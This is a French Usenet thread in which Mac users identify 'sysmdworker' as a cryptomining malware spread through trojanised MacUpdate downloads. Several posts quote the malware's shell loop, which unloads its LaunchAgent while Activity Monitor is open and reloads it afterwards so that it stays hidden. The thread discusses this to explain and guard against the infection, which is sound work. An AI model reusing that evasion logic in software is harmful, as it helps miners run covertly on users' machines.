Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Bon, bilan des courses : c'est un malware qui mine des cryptomonnaies. Il a infecté des logiciels sur MacUpdate tels que Firefox ou Onyx https://www.macupdate.com/app/mac/10700/firefox (voir commentaires) Il installe un dossier "mdworker" dans le Library de l'utilisateur ainsi que deux LaunchAgents MacOS.plist et MacOSupdate.plist destinés à retélécharger/relancer si besoin et à le masquer du moniteur d'activité dès qu'on le lance !!! ----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done ----- -- Fra
Fra <fra-PasDeSp@M-alussinan.org> wrote:
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?
Bon, bilan des courses : c'est un malware qui mine des cryptomonnaies.
Il a infecté des logiciels sur MacUpdate tels que Firefox ou Onyx
https://www.macupdate.com/app/mac/10700/firefox (voir commentaires)
Il installe un dossier "mdworker" dans le Library de l'utilisateur ainsi
que deux LaunchAgents MacOS.plist et MacOSupdate.plist destinés à
retélécharger/relancer si besoin et à le masquer du moniteur d'activité
dès qu'on le lance !!!
-----
while [ 1 ]
do
if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null)
then
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist
elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null)
then
launchctl load -w ~/Library/LaunchAgents/MacOS.plist
fi
sleep 5
Done
-----
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Bon, bilan des courses : c'est un malware qui mine des cryptomonnaies. Il a infecté des logiciels sur MacUpdate tels que Firefox ou Onyx https://www.macupdate.com/app/mac/10700/firefox (voir commentaires) Il installe un dossier "mdworker" dans le Library de l'utilisateur ainsi que deux LaunchAgents MacOS.plist et MacOSupdate.plist destinés à retélécharger/relancer si besoin et à le masquer du moniteur d'activité dès qu'on le lance !!! ----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done ----- -- Fra
mv
Fra a attiré mon attention en écrivant :
Elle n'a pas fonctionnée mais a installé le malware.
Il me semble qu'il y avait eu des commentaires négatifs sur les téléchargements sur MacUpdate (entre autres) il y a un certain temps, je me trompe ? En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les éditeurs eux-mêmes dans la mesure du possible. Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit chez eux. Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
Fra <fra-PasDeSp@M-alussinan.org> a attiré mon attention en écrivant :
Elle n'a pas fonctionnée mais a installé le malware.
Il me semble qu'il y avait eu des commentaires négatifs sur les
téléchargements sur MacUpdate (entre autres) il y a un certain temps, je
me trompe ?
En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les
éditeurs eux-mêmes dans la mesure du possible.
Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit
chez eux.
Cordialement.
--
Michel Vauquois - <http://michelvauquois.fr>
Nouveau : <http://art-doise-4.michelvauquois.free-h.fr>
et <http://art-doise-5.michelvauquois.free-h.fr>
Elle n'a pas fonctionnée mais a installé le malware.
Il me semble qu'il y avait eu des commentaires négatifs sur les téléchargements sur MacUpdate (entre autres) il y a un certain temps, je me trompe ? En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les éditeurs eux-mêmes dans la mesure du possible. Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit chez eux. Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
mv
Fra wrote:
----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done -----
C'est supposé faire quoi ? Tu pourrais dire ? -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
Fra <fra-PasDeSp@M-alussinan.org> wrote:
-----
while [ 1 ]
do
if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null)
then
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist
elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null)
then
launchctl load -w ~/Library/LaunchAgents/MacOS.plist
fi
sleep 5
Done
-----
C'est supposé faire quoi ? Tu pourrais dire ?
--
Michel Vauquois - <http://michelvauquois.fr>
Nouveau : <http://art-doise-4.michelvauquois.free-h.fr>
et <http://art-doise-5.michelvauquois.free-h.fr>
----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done -----
C'est supposé faire quoi ? Tu pourrais dire ? -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
Le Moustique
Le 02/02/2018 à 18:22, MV a écrit :
----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done -----
C'est supposé faire quoi ? Tu pourrais dire ?
D'après ce que je lis, le fait de lancer Activity Monitor provoque l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5 secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance le malware. -- /) -:oo= Guillaume ) Je nettoyais mon clavier, et le coup est parti tout seul.
Le 02/02/2018 à 18:22, MV a écrit :
-----
while [ 1 ]
do
if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null)
then
launchctl unload -w ~/Library/LaunchAgents/MacOS.plist
elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null)
then
launchctl load -w ~/Library/LaunchAgents/MacOS.plist
fi
sleep 5
Done
-----
C'est supposé faire quoi ? Tu pourrais dire ?
D'après ce que je lis, le fait de lancer Activity Monitor provoque
l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5
secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance
le malware.
--
/)
-:oo= Guillaume
)
Je nettoyais mon clavier, et le coup est parti tout seul.
----- while [ 1 ] do if (ps aux | grep "Activity Monitor" | grep -v grep > /dev/null) then launchctl unload -w ~/Library/LaunchAgents/MacOS.plist elif ! (ps aux | grep sysmdworker | grep -v grep > /dev/null) then launchctl load -w ~/Library/LaunchAgents/MacOS.plist fi sleep 5 Done -----
C'est supposé faire quoi ? Tu pourrais dire ?
D'après ce que je lis, le fait de lancer Activity Monitor provoque l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5 secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance le malware. -- /) -:oo= Guillaume ) Je nettoyais mon clavier, et le coup est parti tout seul.
JPP
In article <1njlhbv.8hyn1v16cj2d2N%, (Joseph-B) wrote:
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
In article <1njlhbv.8hyn1v16cj2d2N%josephb@nowhere.invalid>,
josephb@nowhere.invalid (Joseph-B) wrote:
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
In article <1njlhbv.8hyn1v16cj2d2N%, (Joseph-B) wrote:
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
mv
Le Moustique a attiré mon attention en écrivant :
D'après ce que je lis, le fait de lancer Activity Monitor provoque l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5 secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance le malware.
Oh putain ! J'ai tout compris de travers ! J'ai cru qu'il fallait taper ces lignes dans le Terminal pour se débarrasser de la cochonnerie ! ;-) Merci ! Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
Le Moustique <ze.mosquito@free.fr> a attiré mon attention en écrivant :
D'après ce que je lis, le fait de lancer Activity Monitor provoque
l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5
secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance
le malware.
Oh putain ! J'ai tout compris de travers ! J'ai cru qu'il fallait taper
ces lignes dans le Terminal pour se débarrasser de la cochonnerie ! ;-)
Merci !
Cordialement.
--
Michel Vauquois - <http://michelvauquois.fr>
Nouveau : <http://art-doise-4.michelvauquois.free-h.fr>
et <http://art-doise-5.michelvauquois.free-h.fr>
D'après ce que je lis, le fait de lancer Activity Monitor provoque l'arrêt de MacOS.plist (le miner), le script vérifiant toute les 5 secondes le fonctionnement du Moniteur, et dès qu'il est fermé, relance le malware.
Oh putain ! J'ai tout compris de travers ! J'ai cru qu'il fallait taper ces lignes dans le Terminal pour se débarrasser de la cochonnerie ! ;-) Merci ! Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
josephb
Fra wrote:
J'en ai pas loin de 10 !
Bah, là j'en ai 13, mais quasi tous sont "morts", ils pouraient aussi bien avoir quitté, je ne sais pas pourquoi ils sont encore là. Si tu as un doute et veux savoir plus précisément qui/quoi a pu les lancer, dans le Terminal, ça va te montrer sous les jupes des mdworker ps -A | grep "mdworker" | grep -v "grep" -- J. B.
Fra <fra-PasDeSp@M-alussinan.org> wrote:
J'en ai pas loin de 10 !
Bah, là j'en ai 13, mais quasi tous sont "morts", ils pouraient aussi
bien avoir quitté, je ne sais pas pourquoi ils sont encore là.
Si tu as un doute et veux savoir plus précisément qui/quoi a pu les
lancer, dans le Terminal, ça va te montrer sous les jupes des mdworker
Bah, là j'en ai 13, mais quasi tous sont "morts", ils pouraient aussi bien avoir quitté, je ne sais pas pourquoi ils sont encore là. Si tu as un doute et veux savoir plus précisément qui/quoi a pu les lancer, dans le Terminal, ça va te montrer sous les jupes des mdworker ps -A | grep "mdworker" | grep -v "grep" -- J. B.
Le Moustique
Le 02/02/2018 à 18:46, JPP a écrit :
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
Au Chili, on creuse. En Europe, on forge...;-) (Pour le cuivre, pas vraiment, mais bon, on le soude...) -- /) -:oo= Guillaume ) Je nettoyais mon clavier, et le coup est parti tout seul.
Le 02/02/2018 à 18:46, JPP a écrit :
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
Au Chili, on creuse. En Europe, on forge...;-)
(Pour le cuivre, pas vraiment, mais bon, on le soude...)
--
/)
-:oo= Guillaume
)
Je nettoyais mon clavier, et le coup est parti tout seul.
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
Au Chili, on creuse. En Europe, on forge...;-) (Pour le cuivre, pas vraiment, mais bon, on le soude...) -- /) -:oo= Guillaume ) Je nettoyais mon clavier, et le coup est parti tout seul.
josephb
MV wrote:
En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les éditeurs eux-mêmes dans la mesure du possible. Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit chez eux.
++ 1 -- J. B.
MV <mv@orange.invalid> wrote:
En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les
éditeurs eux-mêmes dans la mesure du possible.
Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit
chez eux.
En tout cas, quelqu'un de vraiment prudent ne fait ses MàJ que chez les éditeurs eux-mêmes dans la mesure du possible. Je consulte MacUpdate mais je n'ai jamais téléchargé quoi que ce soit chez eux.
++ 1 -- J. B.
JPP
In article <5a74c9a1$0$3304$, Le Moustique wrote:
Le 02/02/2018 à 18:46, JPP a écrit :
Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
"forgeage" = traduction de "mining" ?
Au Chili, on creuse. En Europe, on forge...;-) (Pour le cuivre, pas vraiment, mais bon, on le soude...)
du fer, de l'argent, de l'or etc. ... y'en a aussi :-)
In article <5a74c9a1$0$3304$426a74cc@news.free.fr>,
Le Moustique <ze.mosquito@free.fr> wrote:
Le 02/02/2018 à 18:46, JPP a écrit :
>> Oui, c'est une nouvelle plaie que le "forgeage" de bitcoins
>
> "forgeage" = traduction de "mining" ?
Au Chili, on creuse. En Europe, on forge...;-)
(Pour le cuivre, pas vraiment, mais bon, on le soude...)
du fer, de l'argent, de l'or etc. ... y'en a aussi :-)